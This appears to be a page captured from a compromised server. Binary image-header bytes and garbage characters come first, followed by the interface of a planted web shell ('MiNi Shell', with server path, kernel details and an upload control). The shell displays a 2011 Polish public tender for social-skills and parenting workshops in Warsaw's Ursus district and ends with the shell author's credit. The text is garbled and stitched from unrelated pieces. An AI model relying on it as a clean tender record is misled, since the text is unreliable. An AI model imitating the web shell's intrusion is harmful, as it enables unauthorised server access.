JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111010/327860-N-2011.html

<p class="kh_header"><b>Warszawa: Realizacja warsztatów  z zakresu umiejętności interpersonalnych, psychoedukacji, treningu umiejętności wychowawczych dla beneficjentów projektu Aktywna integracja w ramach projektu systemowego Ja i moja przyszłość</b><br>
<b>Numer ogłoszenia: 327860 - 2011; data zamieszczenia: 10.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursus m.st. Warszawy , Plac Czerwca 1976 r. Nr 1, 02-495 Warszawa, woj. mazowieckie, tel. 022 4784111, faks 022 4784101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-ursus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja warsztatów  z zakresu umiejętności interpersonalnych, psychoedukacji, treningu umiejętności wychowawczych dla beneficjentów projektu Aktywna integracja w ramach projektu systemowego Ja i moja przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja warsztatów  z zakresu umiejętności interpersonalnych, psychoedukacji, treningu umiejętności wychowawczych.


Warsztat Nr 1 


a.	Warsztaty z zakresu komunikacji interpersonalnej dla 21 osób mężczyzn i kobiet - uczestników projektu systemowego.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat konstruktywnej komunikacji interpersonalnej
Praca nad barierami komunikacyjnymi
Ćwiczenie dobrej komunikacji interpersonalnej
Aspekty komunikacji interpersonalnej w środowisku zawodowym

Warsztaty dla 2 grup (11 osób, 11 osób) z czego każda grupa ma wypracować 5h zegarowych, razem 1 spotkanie dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 5h zegarowych z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Czas pracy 5 h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog, ukończona szkoła treningu i warsztatu psychologicznego, doświadczenie w pracy trenera - psychologa min.: 3 lata z zakresu prowadzenia warsztatów z komunikacji interpersonalnej lub umiejętności interpersonalnych.

Warsztat Nr 2 

Warsztaty z zakresu radzenia sobie z trudnymi emocjami dla 21 osób mężczyzn i kobiet - uczestników projektu systemowego.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat emocji
Nauka radzenia sobie z trudnymi emocjami (złość)
Nauka radzenia sobie z nieprzyjemnymi emocjami (smutek) i wywołującymi stres, napięcie.
Nauka radzenia sobie z emocjami w sytuacjach konfliktowych i trudnych
Trening radzenia sobie z emocjami własnymi i innych osób
Warsztaty dla 2 grup (11 osób, 11 osób) z czego każda grupa ma wypracować 7h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to pierwsze spotkanie 4h a drugie spotkanie 3h zegarowe z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Czas pracy 4 -3 h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog, doświadczenie w pracy trenera - psychologa min.: 3 lata z zakresu prowadzenia warsztatów z radzenia sobie z trudnymi emocjami lub umiejętności interpersonalnych.



Warsztat Nr 3 

Warsztaty z zakresu asertywności dla 21 osób mężczyzn i kobiet - uczestników projektu systemowego.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat asertywności - czym jest, kto to jest osoba asertywna
Ćwiczenie postawy asertywnej w środowisku rodzinnym i zawodowym
Nauka radzenia sobie w sytuacjach trudnych i konfliktowych z wykorzystaniem postawy asertywnej


Warsztaty dla 2 grup (11 osób, 11 osób) z czego każda grupa ma wypracować 8h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 4h zegarowe z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Czas pracy 4 h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog, ukończona szkoły treningu i warsztatu psychologicznego, doświadczenie w pracy trenera - psychologa min.: 3 lata z zakresu prowadzenia warsztatów z asertywności


Warsztat Nr 4

Warsztaty z zakresu Psychoedukacji prozdrowotnej i rodzinnej dla 21 osób mężczyzn i kobiet - uczestników projektu systemowego.
Cele i zakres tematyczny warsztatów:
Psychoedukacja na temat uzależnień i współuzależnieni: co to jest, jakie są konsekwencje społeczne i zdrowotne, jak leczyć, jak rozpoznawać co jest uzależnieniem, jak sobie radzić w sytuacji własnego uzależnienia i osoby bliskiej, gdzie szukać pomocy
Psychoedukacja na temat dysfunkcji w rodzinie i ich konsekwencji na funkcjonowanie systemu rodzinnego i rozwój dzieci
Psychoedukacja na temat systemu rodzinnego: co to jest rodzina, role w rodzinie, rozwój dzieci, relacje i więzi w rodzinie, emocje
Warsztaty dla 2 grup (11 osób, 11 osób) z czego każda grupa ma wypracować 9h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy min 3h max 5h zegarowych z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Czas pracy 3-5 h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog, ukończona szkoła terapii uzależnień, doświadczenie w pracy trenera - psychologa min.: 3 lata w pracy z rodziną, z osobami uzależnionymi, min.:100h zegarowych przeprowadzanie szkoleń w każdym roku.

Warsztat Nr 5

Warsztaty z zakresu motywacji, czyli zarządzanie zmianą dla 21 osób mężczyzn i kobiet - uczestników projektu systemowego.
Cele i zakres tematyczny warsztatów:
Pozytywne i negatywne aspekty dokonywania zmian
Siły wspierające i siły hamujące zmiany
Techniki wprowadzania zmian
Zmiana w czasie - planowanie zmian, okres przejściowy
Zmiany a rodzina
Wzmocnienie motywacji
Nabycie umiejętności wychodzenia z sytuacji kryzysowych i trudnych
Praca nad pozytywnym myśleniem i odnajdywaniem pozytywnych aspektów
Warsztaty dla 2 grup (11 osób, 11 osób) z czego każda grupa ma wypracować 8h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to pierwsze spotkanie 4h zegarowe z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Czas pracy 4h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog, ukończona szkoły treningu i warsztatu psychologicznego, doświadczenie w pracy trenera - psychologa min.: 3 lata z zakresu prowadzenia warsztatów z komunikacji interpersonalnej (120h zrealizowanych)



Warsztat Nr 6

Warsztaty z zakresu trening umiejętności wychowawczych dla 7 uczestników i ich rodzin dzieci w wieku 0-2,5, 4 uczestników i ich rodzin dzieci w wieku 3-6, 4 uczestników i ich rodzin dzieci w wieku 7-11lat, 4 uczestników i ich rodzin dzieci w wieku powyżej 12 r.ż. - ( mężczyzn i kobiet - uczestników projektu systemowego)
Czas pracy 4-6 h w godzinach rozpoczęcie najwcześniej o godz.: 9.00  zakończenie najpóźniej o 17.00 w tygodniu do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w kursach zawodowych dokładny termin będzie ustalany w trakcie podpisywania umowy.
Cele i zakres tematyczny warsztatów:
Warsztat podzielony na grupy wiekowe:
Rodzice dzieci 0-3, 3-6, 7-11, 12 i wyżej
Psychoedukacja na temat rozwoju psychofizycznego dziecka
Psychoedukacja na temat etapów rozwoju
Nabycie wiedzy i umiejętności wychowawczych: metody wychowawcze, komunikacja z dzieckiem, motywowanie dziecka, zabawy z dzieckiem, pielęgnacja dziecka (dotyczy 0-3)
Nabycie wiedzy na temat kryzysów rozwojowych dzieci
Budowanie relacji i więzi z dzieckiem
Organizacja czasu wolnego dziecku
Psychoedukacja na temat okresu dojrzewania dzieci - jak rozpoznawać niepokojące sygnały, jak sobie radzić w sytuacjach, gdy dziecko weszło w trudne sytuacje, gdzie szukać pomocy, jak pomóc dziecku i jak reagować.
Pomoc w edukacji szkolnej dziecku
Praca warsztatowa z rodzicami i dziećmi - porady, praca z dzieckiem, sugestie do pracy z dzieckiem i zmiany.
Praca z samymi rodzicami - edukacja
Warsztaty dla 3 grup (7 osób - z dziećmi w wieku 0-3, 4 osoby z dziećmi w wieku 3-6, 8 osób z dziećmi 7 - 12 i wyżej) z czego każda grupa ma wypracować 8h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy min 3- 4h zegarowe z uwzględnieniem przerwy na kawę i poczęstunek suchy catering. Zajęcia październik - grudzień 2011r.
Wymagania dotyczące wykształcenia i doświadczenia zawodowego trenera: wykształcenie wyższe - psycholog lub pedagog; w przypadku grupy 0-6 psycholog ze specjalizacją psycholog dziecięcy, ukończony kurs wczesnego wspomagania rozwoju,  minimum 3 lata doświadczenia w pracy z dziećmi i rodzinami (300h zrealizowanych) W przypadku grupy 12 i wyżej psycholog, pedagog, minimum 3 lata doświadczenia w pracy z rodzicami i młodzieżą z zakresu umiejętności wychowawczych, problemów wychowawczych młodzieży w okresie adolescencji , motywowania młodzieży ,niepowodzeń szkolnych, profilaktyki uzależnień. ((300h zrealizowanych)

Spotkania będą odbywały się na terenie Dzielnicy Ursus m.st. Warszawy  w Ośrodku Pomocy Społecznej Dz. Ursus przy Pl. Czerwca 1976 Nr 1.



Wykonawca przedstawi  cenę za 1 godzinę realizacji szkolenia biorąc pod uwagę następujące wytyczne:

1.	Cena za 60 min warsztatu/szkolenia, która obejmuje:
a.	Praca trenera
b.	Wykonawca ma obowiązek zapewnienia:
1.	wyposażenie sali: papier do flipchartu, i inne narzędzia niezbędne do realizacji warsztatu np. sprzęt audio, komputer etc.
2.	materiały szkoleniowe
3.	testy i narzędzia do diagnozy
4.	przeprowadzenie ewaluacji szkolenia - pokazującej progres wiedzy uczestników i zmiany jakie zaszły u poszczególnych osób
5.	sporządzenie raportu po szkoleniu, który wskaże Zleceniodawcy dalsze działania niezbędne do tego aby podtrzymać motywację uczestników
c.	Kosztem Wykonawcy jest także przygotowanie
	Serwisu kawowego, czyli: kawa, herbata, woda, sok, ciastka kruche, cukier, mleko do kawy oraz zabezpieczenie naczyń jednorazowych
	Catering w postaci 2 szt, kanapek dla każdego uczestnika szkolenia (bułka, ser, szynka, warzywo - sałata, ogóre klub pomidor) plus owoc np. jabłko.
	Obsługa
d.	Kosztem Wykonawcy jest dojazd trenera na miejsce realizowanego przez niego szkolenia i dowóz cateringu.
e.	Prowadzenie dziennika zajęć i listy obecności.
f.	Rejestrowanie szkoleń na www.inwestycjawakdry.pl
2.	Do obowiązków trenera należy wypełnienie dziennika trenera (zajęć) i zebranie podpisów na liście obecności. Dokumenty trener lub wyznaczona przez firmę osoba koordynująca działania Wykonawcy przekazuje koordynatorowi projektu i stanowią one podstawę do rozliczenia.
3.	Ewaluacja i raport poszkoleniowy sporządzane na koniec szkolenia są przekazywane przez firmę Koordynatorowi projektu i są podstawą do zapłacenia ostatniego rachunku za wykonaną usługę.
4.	Przedstawienie programu szkoleniowego w oparciu o powyższe cele w formie załącznika do oferty i propozycji harmonogramu szkoleń z zastrzeżeniem możliwości dostosowania pozostałych szkoleń w uzgodnieniu z koordynatorem projektu.
5.	W przypadku zmiany trener wymaga się wcześniej akceptacji koordynatora projektu - Zleceniodawcy.
6.	Wyznaczenie osoby koordynującej powyższe działania ze strony Zleceniobiorcy.
7.	Firma powinna być wpisana do rejestru instytucji szkoleniowych Wojewódzkiego Urzędu Pracy właściwego dla siedziby firmy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować lub wykaże, że będzie dysponował trenerem posiadającym następujące wykształcenie:  
a)wyższe - psychologia, pedagogika dla prowadzenia warsztatów nr 1-5 oraz  psychologia ze specjalizacją psychologia dziecięca dla prowadzenia warsztatu nr 6 
oraz  uprawnienia do wykonywania zawodu trenera (ukończona szkoła trenerów lub inne równoważne uprawnienia) dla wszystkich rodzajów warsztatów, ukończona szkoła terapii uzależnień  dla prowadzenia warsztatu nr 4
ukończony kurs wczesnego wspomagania rozwoju dla warsztatu nr 6
b) min. 3 lata (rok bieżący, 2010, 2009, 2008) doświadczenia w prowadzeniu min. 100h warsztatów w każdym roku o podobnym charakterze. 

Na potwierdzenie spełnienia w/w warunków Wykonawca przedstawi 
CV trenera przeznaczonego do wykonania przedmiotu zamówienia oraz  następujące dokumenty:
a)kserokopię poświadczoną przez Wykonawcę za zgodność z oryginałem dyplomu studiów wyższych (psychologia, pedagogika dla prowadzenia warsztatów nr 1-5 oraz  psychologia ze specjalizacją psychologia dziecięca dla prowadzenia warsztatu nr 6) 

b) wyżej opisanych oraz dokument potwierdzający posiadanie uprawnień trenera i w/w kursów.
c)wypełniony załączniki nr 3 Doświadczenie zawodowe trenera -  dokument  potwierdzający min. 3 letnie doświadczenie w prowadzeniu warsztatów o podobnym charakterze  z podaniem daty realizacji usługi,  zleceniodawcy, liczby wypracowanych godzin, grupy odbiorców zajęć oraz referencje lub inny dokument potwierdzający należytą realizację min. 3 warsztatów. Wykonawca wykaże, że w ciągu 3 lat zrealizował 100h rocznie (razem 300h)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian do umowy w szczególności zmiany treści i warunków umowy mogą nastąpić w przypadku: 
a)	zmiany personelu odpowiedzialnego za wykonanie zamówienia zarówno po stronie Wykonawcy jak i Zamawiającego, 
b)	zawieszenia przez Zamawiającego wykonywania zamówienia,
c)	działania siły wyższej,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-ursus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac CZerwca 1976r NR 1
02-495 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2011 godzina 10:00, miejsce: Plac CZerwca 1976r NR 1
02-495 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PO KL poddziałanie 7.1.1 projekt Ja i moja przyszłość.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com